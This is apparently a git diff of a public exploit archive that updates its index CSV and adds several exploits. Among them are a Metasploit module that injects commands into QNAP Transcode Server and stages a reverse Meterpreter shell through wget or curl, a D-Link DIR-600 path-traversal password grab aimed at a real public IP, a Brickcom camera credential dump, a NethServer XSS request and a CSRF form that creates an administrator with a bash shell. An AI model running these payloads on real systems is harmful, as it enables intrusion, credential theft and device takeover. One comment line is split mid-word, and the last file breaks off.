25598,platforms/osx/remote/25598.txt,"Apple Mac OSX 10.x - BlueTooth Directory Traversal",2005-05-04,"Kevin Finisterre",osx,remote,0
|
||||
25600,platforms/windows/remote/25600.txt,"simplecam 1.2 - Directory Traversal",2005-05-04,"Donato Ferrante",windows,remote,0
|
||||
25608,platforms/hardware/remote/25608.rb,"Linksys WRT160N v2 - apply.cgi Remote Command Injection (Metasploit)",2013-05-21,Metasploit,hardware,remote,80
|
||||
25609,platforms/hardware/remote/25609.rb,"D-Link DIR615h - OS Command Injection (Metasploit)",2013-05-21,Metasploit,hardware,remote,80
|
||||
25609,platforms/hardware/remote/25609.rb,"D-Link DIR-615H - OS Command Injection (Metasploit)",2013-05-21,Metasploit,hardware,remote,80
|
||||
25820,platforms/linux/remote/25820.txt,"Finjan SurfinGate 7.0 - ASCII File Extension File Filter Circumvention",2005-06-14,d.schroeter@gmx.de,linux,remote,0
|
||||
25822,platforms/windows/remote/25822.xml,"Adobe Acrobat 7.0 / Adobe Reader 7.0 - File Existence and Disclosure",2005-06-15,"Sverre H. Huseby",windows,remote,0
|
||||
25613,platforms/multiple/remote/25613.txt,"Oracle 9i/10g - Database Fine Grained Audit Logging Failure",2005-05-05,"Alexander Kornbrust",multiple,remote,0
|
||||
|
@ -15208,7 +15209,7 @@ id,file,description,date,author,platform,type,port
|
|||
36744,platforms/windows/remote/36744.rb,"Adobe Flash Player - casi32 Integer Overflow (Metasploit)",2015-04-13,Metasploit,windows,remote,0
|
||||
36756,platforms/windows/remote/36756.html,"Samsung iPOLiS - ReadConfigValue Remote Code Execution",2015-04-14,"Praveen Darshanam",windows,remote,0
|
||||
36767,platforms/hardware/remote/36767.html,"D-Link DAP-1150 1.2.94 - Cross-Site Request Forgery",2012-02-13,MustLive,hardware,remote,0
|
||||
36803,platforms/linux/remote/36803.py,"ProFTPd 1.3.5 - (mod_copy) Remote Command Execution",2015-04-21,R-73eN,linux,remote,0
|
||||
36803,platforms/linux/remote/36803.py,"ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution",2015-04-21,R-73eN,linux,remote,0
|
||||
36808,platforms/windows/remote/36808.rb,"Adobe Flash Player - copyPixelsToByteArray Integer Overflow (Metasploit)",2015-04-21,Metasploit,windows,remote,0
|
||||
36809,platforms/php/remote/36809.rb,"WordPress Plugin Reflex Gallery - Arbitrary File Upload (Metasploit)",2015-04-21,Metasploit,php,remote,80
|
||||
36810,platforms/php/remote/36810.rb,"WordPress Plugin N-Media Website Contact Form - Arbitrary File Upload (Metasploit)",2015-04-21,Metasploit,php,remote,80
|
||||
|
@ -15252,7 +15253,7 @@ id,file,description,date,author,platform,type,port
|
|||
37171,platforms/hardware/remote/37171.rb,"D-Link Devices - HNAP SOAPAction-Header Command Execution (Metasploit)",2015-06-01,Metasploit,hardware,remote,0
|
||||
37184,platforms/hardware/remote/37184.py,"Seagate Central 2014.0410.0026-F - Remote Command Execution",2015-06-03,"Jeremy Brown",hardware,remote,0
|
||||
37198,platforms/multiple/remote/37198.rb,"JDownloader 2 Beta - Directory Traversal",2015-06-04,PizzaHatHacker,multiple,remote,0
|
||||
37262,platforms/linux/remote/37262.rb,"ProFTPd 1.3.5 - 'Mod_Copy' Command Execution (Metasploit)",2015-06-10,Metasploit,linux,remote,0
|
||||
37262,platforms/linux/remote/37262.rb,"ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit)",2015-06-10,Metasploit,linux,remote,0
|
||||
37336,platforms/multiple/remote/37336.txt,"CUPS < 2.0.3 - Multiple Vulnerabilities",2015-06-22,"Google Security Research",multiple,remote,0
|
||||
37368,platforms/multiple/remote/37368.rb,"Adobe Flash Player - ShaderJob Buffer Overflow (Metasploit)",2015-06-24,Metasploit,multiple,remote,0
|
||||
37396,platforms/windows/remote/37396.txt,"XAMPP for Windows 1.7.7 - Multiple Cross-Site Scripting / SQL Injection",2012-06-13,Sangteamtham,windows,remote,0
|
||||
|
@ -15694,6 +15695,7 @@ id,file,description,date,author,platform,type,port
|
|||
41795,platforms/linux/remote/41795.rb,"SolarWinds LEM 6.3.1 - Remote Code Execution (Metasploit)",2017-03-17,"Mehmet Ince",linux,remote,0
|
||||
42261,platforms/windows/remote/42261.py,"Easy File Sharing Web Server 7.2 - GET Request 'PassWD' Buffer Overflow (SEH)",2017-06-27,clubjk,windows,remote,80
|
||||
42256,platforms/windows/remote/42256.rb,"Easy File Sharing HTTP Server 7.2 - POST Buffer Overflow (Metasploit)",2017-06-17,Metasploit,windows,remote,80
|
||||
42587,platforms/hardware/remote/42587.rb,"QNAP Transcode Server - Command Execution (Metasploit)",2017-08-29,Metasploit,hardware,remote,9251
|
||||
42316,platforms/windows/remote/42316.ps1,"Skype for Business 2016 - Cross-Site Scripting",2017-07-12,nyxgeek,windows,remote,0
|
||||
41987,platforms/windows/remote/41987.py,"Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)",2017-05-10,"Juan Sacco",windows,remote,0
|
||||
42287,platforms/android/remote/42287.txt,"eVestigator Forensic PenTester - MITM Remote Code Execution",2017-06-30,intern0t,android,remote,0
|
||||
|
@ -27589,7 +27591,7 @@ id,file,description,date,author,platform,type,port
|
|||
24449,platforms/jsp/webapps/24449.txt,"Cisco Unity Express - Multiple Vulnerabilities",2013-02-05,"Jacob Holcomb",jsp,webapps,0
|
||||
24451,platforms/php/webapps/24451.txt,"ArrowChat 1.5.61 - Multiple Vulnerabilities",2013-02-05,kallimero,php,webapps,0
|
||||
24452,platforms/php/webapps/24452.txt,"AdaptCMS 2.0.4 - 'config.php' 'question' Parameter SQL Injection",2013-02-05,kallimero,php,webapps,0
|
||||
24453,platforms/hardware/webapps/24453.txt,"D-Link DIR-600 / DIR-300 (rev B) - Multiple Vulnerabilities",2013-02-05,m-1-k-3,hardware,webapps,0
|
||||
24453,platforms/hardware/webapps/24453.txt,"D-Link DIR-600 / DIR-300 (Rev B) - Multiple Vulnerabilities",2013-02-05,m-1-k-3,hardware,webapps,0
|
||||
24454,platforms/php/webapps/24454.txt,"Free Monthly Websites 2.0 - Multiple Vulnerabilities",2013-02-05,X-Cisadane,php,webapps,0
|
||||
24456,platforms/php/webapps/24456.txt,"glossword 1.8.12 - Multiple Vulnerabilities",2013-02-05,AkaStep,php,webapps,0
|
||||
24457,platforms/php/webapps/24457.txt,"Glossword 1.8.3 - SQL Injection",2013-02-05,AkaStep,php,webapps,0
|
||||
|
@ -27602,7 +27604,7 @@ id,file,description,date,author,platform,type,port
|
|||
24503,platforms/hardware/webapps/24503.txt,"Edimax EW-7206-APg and EW-7209APg - Multiple Vulnerabilities",2013-02-15,m-1-k-3,hardware,webapps,0
|
||||
24475,platforms/hardware/webapps/24475.txt,"Linksys E1500/E2500 - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps,0
|
||||
24476,platforms/hardware/webapps/24476.txt,"Linksys WAG200G - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps,0
|
||||
24477,platforms/hardware/webapps/24477.txt,"D-Link DIR-615 rev H - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps,0
|
||||
24477,platforms/hardware/webapps/24477.txt,"D-Link DIR-615 Rev H - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps,0
|
||||
24478,platforms/hardware/webapps/24478.txt,"Linksys WRT160N - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps,0
|
||||
24480,platforms/php/webapps/24480.txt,"IRIS Citations Management Tool - Authenticated Remote Command Execution",2013-02-11,aeon,php,webapps,0
|
||||
24481,platforms/php/webapps/24481.txt,"IP.Gallery 4.2.x/5.0.x - Persistent Cross-Site Scripting",2013-02-11,"Mohamed Ramadan",php,webapps,0
|
||||
|
@ -27847,7 +27849,7 @@ id,file,description,date,author,platform,type,port
|
|||
25817,platforms/cgi/webapps/25817.txt,"JamMail 1.8 - Jammail.pl Arbitrary Command Execution",2005-06-12,blahplok,cgi,webapps,0
|
||||
25818,platforms/php/webapps/25818.txt,"Singapore 0.9.11 Beta Image Gallery - 'index.php' Cross-Site Scripting",2005-06-13,TheGreatOne2176,php,webapps,0
|
||||
24973,platforms/php/webapps/24973.txt,"VoipNow 2.5 - Local File Inclusion",2013-04-22,i-Hmx,php,webapps,0
|
||||
24975,platforms/hardware/webapps/24975.txt,"D-Link DIR-615 Hardware rev D3 / DIR-300 Hardware rev A - Multiple Vulnerabilities",2013-04-23,m-1-k-3,hardware,webapps,0
|
||||
24975,platforms/hardware/webapps/24975.txt,"D-Link DIR-615 Rev D3 / DIR-300 Rev A - Multiple Vulnerabilities",2013-04-23,m-1-k-3,hardware,webapps,0
|
||||
25089,platforms/php/webapps/25089.txt,"PHP-Fusion 4.0 - 'Viewthread.php' Information Disclosure",2005-02-08,TheGreatOne2176,php,webapps,0
|
||||
24986,platforms/cgi/webapps/24986.txt,"IkonBoard 3.x - Multiple SQL Injections",2004-12-16,anonymous,cgi,webapps,0
|
||||
24987,platforms/php/webapps/24987.txt,"JSBoard 2.0.x - Arbitrary Script Upload",2004-12-16,"Jeremy Bae",php,webapps,0
|
||||
|
@ -32579,7 +32581,7 @@ id,file,description,date,author,platform,type,port
|
|||
31754,platforms/cgi/webapps/31754.txt,"SAP Internet Transaction Server 6200.1017.50954.0 - Bu WGate 'wgate.dll' ~service Parameter Cross-Site Scripting",2008-05-08,Portcullis,cgi,webapps,0
|
||||
31755,platforms/cgi/webapps/31755.txt,"SAP Internet Transaction Server 6200.1017.50954.0 - Bu query String JavaScript Splicing Cross-Site Scripting",2008-05-08,Portcullis,cgi,webapps,0
|
||||
31760,platforms/windows/webapps/31760.txt,"Lotus Sametime 8.5.1 - Password Disclosure",2014-02-19,"Adriano Marcio Monteiro",windows,webapps,5081
|
||||
31764,platforms/hardware/webapps/31764.txt,"D-Link DIR-615 Hardware vE4 Firmware 5.10 - Cross-Site Request Forgery",2014-02-19,"Dhruv Shah",hardware,webapps,80
|
||||
31764,platforms/hardware/webapps/31764.txt,"D-Link DIR-615 vE4 Firmware 5.10 - Cross-Site Request Forgery",2014-02-19,"Dhruv Shah",hardware,webapps,80
|
||||
31765,platforms/hardware/webapps/31765.txt,"Barracuda Message Archiver 650 - Persistent Cross-Site Scripting",2014-02-19,Vulnerability-Lab,hardware,webapps,3378
|
||||
31768,platforms/php/webapps/31768.txt,"WordPress Plugin BP Group Documents 1.2.1 - Multiple Vulnerabilities",2014-02-19,"Tom Adams",php,webapps,80
|
||||
31771,platforms/php/webapps/31771.txt,"cPanel 11.x - scripts2/knowlegebase issue Parameter Cross-Site Scripting",2008-05-09,"Matteo Carli",php,webapps,0
|
||||
|
@ -32977,7 +32979,7 @@ id,file,description,date,author,platform,type,port
|
|||
32374,platforms/ios/webapps/32374.txt,"Wireless Drive 1.1.0 iOS - Multiple Web Vulnerabilities",2014-03-20,Vulnerability-Lab,ios,webapps,0
|
||||
32375,platforms/php/webapps/32375.txt,"OXID eShop < 4.7.11/5.0.11 / < 4.8.4/5.1.4 - Multiple Vulnerabilities",2014-03-20,//sToRm,php,webapps,0
|
||||
32383,platforms/php/webapps/32383.txt,"phpMyAdmin 3.2 - 'server_databases.php' Remote Command Execution",2008-09-15,"Norman Hippert",php,webapps,0
|
||||
32385,platforms/hardware/webapps/32385.txt,"D-Link DIR-600L Hardware Version AX Firmware 1.00 - Cross-Site Request Forgery",2014-03-20,"Dhruv Shah",hardware,webapps,0
|
||||
32385,platforms/hardware/webapps/32385.txt,"D-Link DIR-600L AX 1.00 - Cross-Site Request Forgery",2014-03-20,"Dhruv Shah",hardware,webapps,0
|
||||
32418,platforms/php/webapps/32418.txt,"EasyRealtorPRO 2008 - 'site_search.php' Multiple SQL Injections",2008-09-25,"David Sopas",php,webapps,0
|
||||
32419,platforms/php/webapps/32419.pl,"Libra File Manager 1.18/2.0 - 'fileadmin.php' Local File Inclusion",2008-09-25,Pepelux,php,webapps,0
|
||||
32421,platforms/php/webapps/32421.html,"Flatpress 0.804 - Multiple Cross-Site Scripting Vulnerabilities",2008-09-25,"Fabian Fingerle",php,webapps,0
|
||||
|
@ -38363,3 +38365,11 @@ id,file,description,date,author,platform,type,port
|
|||
42574,platforms/php/webapps/42574.txt,"Flash Poker 2.0 - 'game' Parameter SQL Injection",2017-08-28,"Ihsan Sencan",php,webapps,0
|
||||
42575,platforms/php/webapps/42575.txt,"Login-Reg Members Management PHP 1.0 - Arbitrary File Upload",2017-08-28,"Ihsan Sencan",php,webapps,0
|
||||
42578,platforms/php/webapps/42578.txt,"Schools Alert Management Script - Authentication Bypass",2017-08-28,"Ali BawazeEer",php,webapps,0
|
||||
42579,platforms/json/webapps/42579.txt,"NethServer 7.3.1611 - Cross-Site Request Forgery / Cross-Site Scripting",2017-08-28,LiquidWorm,json,webapps,0
|
||||
42580,platforms/json/webapps/42580.html,"NethServer 7.3.1611 - Cross-Site Request Forgery (Create User / Enable SSH Access)",2017-08-28,LiquidWorm,json,webapps,0
|
||||
42581,platforms/hardware/webapps/42581.txt,"D-Link DIR-600 - Authentication Bypass",2017-08-29,"Jithin D Kurup",hardware,webapps,0
|
||||
42582,platforms/php/webapps/42582.txt,"Car or Cab Booking Script - Authentication Bypass",2017-08-28,"Ali BawazeEer",php,webapps,0
|
||||
42583,platforms/php/webapps/42583.txt,"PHP Appointment Booking Script - Authentication Bypass",2017-08-28,"Ali BawazeEer",php,webapps,0
|
||||
42584,platforms/php/webapps/42584.txt,"User Login and Management - Multiple Vulnerabilities",2017-08-29,"Ali BawazeEer",php,webapps,0
|
||||
42585,platforms/php/webapps/42585.txt,"PHP Video Battle Script 1.0 - SQL Injection",2017-08-28,"Ihsan Sencan",php,webapps,0
|
||||
42588,platforms/hardware/webapps/42588.txt,"Brickcom IP Camera - Credentials Disclosure",2017-08-29,"Emiliano Ipar",hardware,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
117
platforms/hardware/remote/42587.rb
Executable file
117
platforms/hardware/remote/42587.rb
Executable file
|
@ -0,0 +1,117 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Exploit::CmdStager
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'QNAP Transcode Server Command Execution',
|
||||
'Description' => %q{
|
||||
This module exploits an unauthenticated remote command injection
|
||||
vulnerability in QNAP NAS devices. The transcoding server listens
|
||||
on port 9251 by default and is vulnerable to command injection
|
||||
using the 'rmfile' command.
|
||||
|
||||
This module was tested successfully on a QNAP TS-431 with
|
||||
firmware version 4.3.3.0262 (20170727).
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'Zenofex', # Initial vulnerability discovery and PoC
|
||||
'0x00string', # Initial vulnerability discovery and PoC
|
||||
'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'linux',
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'https://www.exploitee.rs/index.php/QNAP_TS-131' ],
|
||||
[ 'URL', 'http://docs.qnap.com/nas/4.1/Home/en/index.html?transcode_management.htm' ]
|
||||
],
|
||||
'DisclosureDate' => 'Aug 6 2017',
|
||||
'Privileged' => true,
|
||||
'Arch' => ARCH_ARMLE,
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'
|
||||
},
|
||||
'Targets' => [['Automatic', {}]],
|
||||
'CmdStagerFlavor' => %w{wget curl},
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(9251),
|
||||
OptInt.new('DELAY', [true, 'How long to wait for the device to download the payload', 30])
|
||||
])
|
||||
deregister_options 'cmdstager::decoder'
|
||||
end
|
||||
|
||||
def check
|
||||
vprint_status 'Connecting to transcode server...'
|
||||
|
||||
connect
|
||||
sock.put "\x01\x00\x00\x00"
|
||||
res = sock.get_once
|
||||
|
||||
if res.blank?
|
||||
vprint_status 'No reply from server'
|
||||
return CheckCode::Safe
|
||||
end
|
||||
|
||||
vprint_status "Received response: #{res}"
|
||||
|
||||
return CheckCode::Detected if res.to_s =~ /client's request is accepted/
|
||||
|
||||
CheckCode::Safe
|
||||
rescue ::Rex::ConnectionError
|
||||
vprint_error 'Connection failed'
|
||||
return CheckCode::Unknown
|
||||
ensure
|
||||
disconnect
|
||||
end
|
||||
|
||||
def execute_command(cmd, opts)
|
||||
# Filtered characters: 0x20 ! $ & 0x39 , ; = [ ] ^ ` { } %
|
||||
# Execute each command seperately
|
||||
cmd.split(';').each do |c|
|
||||
connect
|
||||
vprint_status "Executing command: #{c}"
|
||||
|
||||
# Replace spaces with tabs
|
||||
c.tr! ' ', "\t"
|
||||
|
||||
sock.put "\x01\x00\x00\x00/|#{c}|\x00"
|
||||
res = sock.get_once
|
||||
|
||||
unless res.to_s =~ /client's request is accepted/
|
||||
print_status 'Unexpected reply'
|
||||
break
|
||||
end
|
||||
|
||||
print_status "Sent command successfully (#{c.length} bytes)"
|
||||
|
||||
disconnect
|
||||
|
||||
if c =~ /^(curl|wget)/
|
||||
print_status "Waiting for the device to download the payload (#{datastore['DELAY']} seconds)..."
|
||||
Rex.sleep datastore['DELAY']
|
||||
end
|
||||
end
|
||||
rescue ::Rex::ConnectionError
|
||||
fail_with Failure::Unreachable, 'Failed to connect to the transcode server'
|
||||
ensure
|
||||
disconnect
|
||||
end
|
||||
|
||||
def exploit
|
||||
vprint_status 'Connecting to transcode server...'
|
||||
execute_cmdstager linemax: 400
|
||||
end
|
||||
end
|
53
platforms/hardware/webapps/42581.txt
Executable file
53
platforms/hardware/webapps/42581.txt
Executable file
|
@ -0,0 +1,53 @@
|
|||
# Exploit Title: D-Link DIR-600 - Authentication Bypass (Absolute Path Traversal Attack)
|
||||
# CVE - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12943
|
||||
# Date: 29-08-2017
|
||||
# Exploit Author: Jithin D Kurup
|
||||
# Contact : https://in.linkedin.com/in/jithin-d-kurup-77b616142
|
||||
# Vendor : www.dlink.com
|
||||
# Version: Hardware version: B1
|
||||
Firmware version: 2.01
|
||||
# Tested on:All Platforms
|
||||
|
||||
|
||||
1) Description
|
||||
|
||||
After Successfully Connected to D-Link DIR-600
|
||||
Router(FirmWare Version : 2.01), Any User Can Easily Bypass The Router's
|
||||
Admin Panel Just by adding a simple payload into URL.
|
||||
|
||||
D-Link DIR-600 Rev Bx devices with v2.x firmware allow remote attackers to
|
||||
read passwords via a model/__show_info.php?REQUIRE_FILE= absolute path traversal attack,
|
||||
as demonstrated by discovering the admin password.
|
||||
|
||||
Its More Dangerous when your Router has a public IP with remote login
|
||||
enabled.
|
||||
|
||||
|
||||
IN MY CASE,
|
||||
Tested Router IP : http://190.164.170.249
|
||||
|
||||
|
||||
|
||||
Video POC : https://www.youtube.com/watch?v=PeNOJORAQsQ
|
||||
|
||||
2) Proof of Concept
|
||||
|
||||
Step 1: Go to
|
||||
Router Login Page : http://190.164.170.249:8080
|
||||
|
||||
Step 2:
|
||||
Add the payload to URL.
|
||||
|
||||
Payload: model/__show_info.php?REQUIRE_FILE=%2Fvar%2Fetc%2Fhttpasswd
|
||||
|
||||
|
||||
|
||||
Bingooo You got admin Access on router.
|
||||
Now you can download/upload settiing, Change setting etc.
|
||||
|
||||
|
||||
|
||||
|
||||
---------------Greetz----------------
|
||||
+++++++++++ www.0seccon.com ++++++++++++
|
||||
Saran,Dhani,Gem,Vignesh,Hemanth,Sudin,Vijith
|
117
platforms/hardware/webapps/42588.txt
Executable file
117
platforms/hardware/webapps/42588.txt
Executable file
|
@ -0,0 +1,117 @@
|
|||
1. Advisory Information
|
||||
========================================
|
||||
Title:
|
||||
|
||||
Brickcom IP-Camera Remote Credentials and Settings Disclosure
|
||||
|
||||
|
||||
Vendor Homepage:
|
||||
|
||||
http://www.brickcom.com
|
||||
|
||||
Tested on Camera types:
|
||||
|
||||
WCB-040Af, WCB-100A, WCB-100Ae, OB-302Np, OB-300Af, OB-500Af
|
||||
|
||||
|
||||
Remotely Exploitable:
|
||||
|
||||
Yes
|
||||
|
||||
Vulnerability:
|
||||
|
||||
Username / Password / Settings Disclosure (Critical)
|
||||
|
||||
Shodan Dork:
|
||||
|
||||
title:"Brickcom"
|
||||
|
||||
|
||||
Date:
|
||||
|
||||
14/12/2016
|
||||
|
||||
Authors:
|
||||
|
||||
Emiliano Ipar (@maninoipar) (linkedin.com/in/emilianoipar)
|
||||
|
||||
Ignacio Agustín Lizaso (@ignacio_lizaso) (linkedin.com/in/ignacio-
|
||||
lizaso-9ab73359)
|
||||
Gastón Emanuel Rivadero (@derlok_epsilon) (linkedin.com/in/gaston-
|
||||
emanuel-rivadero-858b9ba)
|
||||
|
||||
|
||||
2. CREDIT
|
||||
========================================
|
||||
This vulnerability was identified during penetration test and Research by
|
||||
Emiliano Ipar, Ignacio Lizaso and Gastón Rivadero.
|
||||
|
||||
|
||||
3. Description
|
||||
========================================
|
||||
Brickom Cameras allow a low-privilege user to disclose every configuration
|
||||
in the NVRAM, including credentials in clear text, remotely by making a
|
||||
simple requests. This vulnerability, coupled with the fact that there are
|
||||
two default users with known passwords which are rarely modified, allows an
|
||||
attacker to disclose the admin password and latter every config.
|
||||
|
||||
The most Critical API call is users.cgi?action=getUsers, which provides
|
||||
every user credential. Many other API calls to get information for the WIFI
|
||||
password or FTP credentials, even the whole configuration, are affected
|
||||
depending on the camera model.
|
||||
|
||||
On the hardware side, the UART console of some models (example: WCB-040Af,
|
||||
with baudrate 38400) is exposed in the PCB and after soldering the
|
||||
corresponding pins and connecting, the resulting shell has root access. A
|
||||
simple NVSHOW command will list every config available in clear text,
|
||||
including credentials.
|
||||
|
||||
|
||||
4. Proof-of-Concept:
|
||||
========================================
|
||||
Using the following GET request:
|
||||
|
||||
curl http://<IP>:<PORT>/cgi-bin/users.cgi?action=getUsers -u user:pass -v
|
||||
|
||||
Request:
|
||||
----------
|
||||
> GET /cgi-bin/users.cgi?action=getUsers HTTP/1.1
|
||||
> Authorization: Basic <BASE64 user:pass>
|
||||
> User-Agent: curl/7.35.0
|
||||
> Host: <IP>:<PORT>
|
||||
> Accept: */*
|
||||
>
|
||||
|
||||
|
||||
Response:
|
||||
----------
|
||||
< HTTP/1.1 200 Ok
|
||||
< Server: mini_httpd
|
||||
< Cache-Control: no-cache
|
||||
< Pragma: no-cache
|
||||
< Expires: 0
|
||||
< Content-Type: text/html
|
||||
< Connection: close
|
||||
<
|
||||
size=3
|
||||
User1.index=0
|
||||
User1.username=admin
|
||||
User1.password=admin
|
||||
User1.privilege=1
|
||||
|
||||
User2.index=1
|
||||
User2.username=viewer
|
||||
User2.password=viewer
|
||||
User2.privilege=0
|
||||
|
||||
User3.index=3
|
||||
User3.username=rviewer
|
||||
User3.password=rviewer
|
||||
User3.privilege=2
|
||||
|
||||
5. SOLUTION
|
||||
========================================
|
||||
The vendor has been contacted and the firmware was updated. See disclosure
|
||||
in:
|
||||
|
||||
https://www.brickcom.com/news/productCERT_security_advisorie.php
|
60
platforms/json/webapps/42579.txt
Executable file
60
platforms/json/webapps/42579.txt
Executable file
|
@ -0,0 +1,60 @@
|
|||
NethServer 7.3.1611 (Upload.json) CSRF Script Insertion Vulnerability
|
||||
|
||||
|
||||
Vendor: NethServer.org
|
||||
Product web page: https://www.nethserver.org
|
||||
Affected version: 7.3.1611-u1-x86_64
|
||||
|
||||
Summary: NethServer is an operating system for the Linux enthusiast,
|
||||
designed for small offices and medium enterprises. It's simple, secure
|
||||
and flexible.
|
||||
|
||||
Desc: NethServer suffers from an authenticated stored XSS vulnerability.
|
||||
Input passed to the 'BackupConfig[Upload][Description]' POST parameter is
|
||||
not properly sanitised before being returned to the user. This can be exploited
|
||||
to execute arbitrary HTML and script code in a user's browser session in
|
||||
context of an affected site.
|
||||
|
||||
Tested on: Kernel 3.10.0.-514.el7.x86_64 on an x86_64
|
||||
CentOS Linux 7.3.1611 (Core)
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2017-5432
|
||||
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5432.php
|
||||
|
||||
|
||||
16.08.2017
|
||||
|
||||
--
|
||||
|
||||
|
||||
PoC request:
|
||||
|
||||
POST /en-US/BackupConfig/Upload.json HTTP/1.1
|
||||
Host: 172.19.0.195:980
|
||||
Connection: close
|
||||
Content-Length: 15762
|
||||
Accept: */*
|
||||
Origin: https://172.19.0.195:980
|
||||
X-Requested-With: XMLHttpRequest
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
|
||||
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8FfEu2Tn6fUOnT80
|
||||
Referer: https://172.19.0.195:980/en-US/BackupConfig
|
||||
Accept-Language: en-US,en;q=0.8,mk;q=0.6
|
||||
Cookie: nethgui=4igflab8fmbi5aq26pvsp5r0f2
|
||||
|
||||
------WebKitFormBoundary8FfEu2Tn6fUOnT80
|
||||
Content-Disposition: form-data; name="arc"; filename="backup-config.7z.xz"
|
||||
Content-Type: application/x-xz
|
||||
|
||||
[xz content omitted]
|
||||
------WebKitFormBoundary8FfEu2Tn6fUOnT80
|
||||
Content-Disposition: form-data; name="BackupConfig[Upload][Description]"
|
||||
|
||||
<script>confirm(017)</script>
|
||||
------WebKitFormBoundary8FfEu2Tn6fUOnT80--
|
||||
|
58
platforms/json/webapps/42580.html
Executable file
58
platforms/json/webapps/42580.html
Executable file
|
@ -0,0 +1,58 @@
|
|||
<!--
|
||||
|
||||
NethServer 7.3.1611 (create.json) CSRF Create User And Enable SSH Access
|
||||
|
||||
|
||||
Vendor: NethServer.org
|
||||
Product web page: https://www.nethserver.org
|
||||
Affected version: 7.3.1611-u1-x86_64
|
||||
|
||||
Summary: NethServer is an operating system for the Linux
|
||||
enthusiast, designed for small offices and medium enterprises.
|
||||
It's simple, secure and flexible.
|
||||
|
||||
Desc: The application interface allows users to perform certain
|
||||
actions via HTTP requests without performing any validity checks
|
||||
to verify the requests. This can be exploited to perform certain
|
||||
actions with administrative privileges if a logged-in user visits
|
||||
a malicious web site.
|
||||
|
||||
Tested on: Kernel 3.10.0.-514.el7.x86_64 on an x86_64
|
||||
CentOS Linux 7.3.1611 (Core)
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2017-5433
|
||||
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5433.php
|
||||
|
||||
|
||||
16.08.2017
|
||||
|
||||
-->
|
||||
|
||||
|
||||
HTML Decoded PoC:
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<script>history.pushState('', '', '/')</script>
|
||||
<form action="https://172.19.0.195:980/en-US/Account/User/create.json" method="POST">
|
||||
<input type="hidden" name="Account[User][create][username]" value="Blabla" />
|
||||
<input type="hidden" name="Account[User][create][gecos]" value="Test1" />
|
||||
<input type="hidden" name="Account[User][create][groups]" value="" />
|
||||
<input type="hidden" name="Account[User][create][groups][1]" value="admin@zsl.lsz" />
|
||||
<input type="hidden" name="Account[User][create][expires]" value="no" />
|
||||
<input type="hidden" name="Account[User][create][shell]" value="/usr/libexec/openssh/sftp-server" />
|
||||
<input type="hidden" name="Account[User][create][shell]" value="/bin/bash" />
|
||||
<input type="hidden" name="Account[User][create][setPassword]" value="disabled" />
|
||||
<input type="hidden" name="Account[User][create][setPassword]" value="enabled" />
|
||||
<input type="hidden" name="Account[User][create][newPassword]" value="gi3fme$heLL!" />
|
||||
<input type="hidden" name="Account[User][create][confirmNewPassword]" value="gi3fme$heLL!" />
|
||||
<input type="hidden" name="Account[User][create][Submit]" value="Submit" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
|
@ -1,7 +1,8 @@
|
|||
/*
|
||||
* This is simple local exploit (Proof of Concept?) for local bug in ProFTPd
|
||||
* not in default options (must be configured with option --enable-ctrls).
|
||||
* Bug exist in function pr_ctrls_connect() in file "src/ctrls.c", look:
|
||||
* Bug exist in func
|
||||
tion pr_ctrls_connect() in file "src/ctrls.c", look:
|
||||
*
|
||||
* "src/ctrls.c"
|
||||
* int pr_ctrls_connect(const char *socket_file) {
|
||||
|
|
46
platforms/php/webapps/42582.txt
Executable file
46
platforms/php/webapps/42582.txt
Executable file
|
@ -0,0 +1,46 @@
|
|||
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
|
||||
|
||||
<!--
|
||||
# Exploit Title: Car or Cab Booking Script - SQL injection login bypass
|
||||
# Exploit Author: Ali BawazeEer || https://sa.linkedin.com/in/alibawazeeer
|
||||
# Dork: N/A
|
||||
# Date: 28.08.2017
|
||||
# software link : http://www.phpscriptsmall.com/product/cab-booking-script/
|
||||
# Version: 3.04
|
||||
# Category: Webapps
|
||||
# Tested on: windows64bit / mozila firefox
|
||||
#
|
||||
#
|
||||
--!>
|
||||
|
||||
# ========================================================
|
||||
#
|
||||
#
|
||||
# Car or Cab Booking Script - SQL injection login bypass
|
||||
#
|
||||
# Description : an attacker is able to inject malicious sql query to bypass the login page and login as admin of the particular school
|
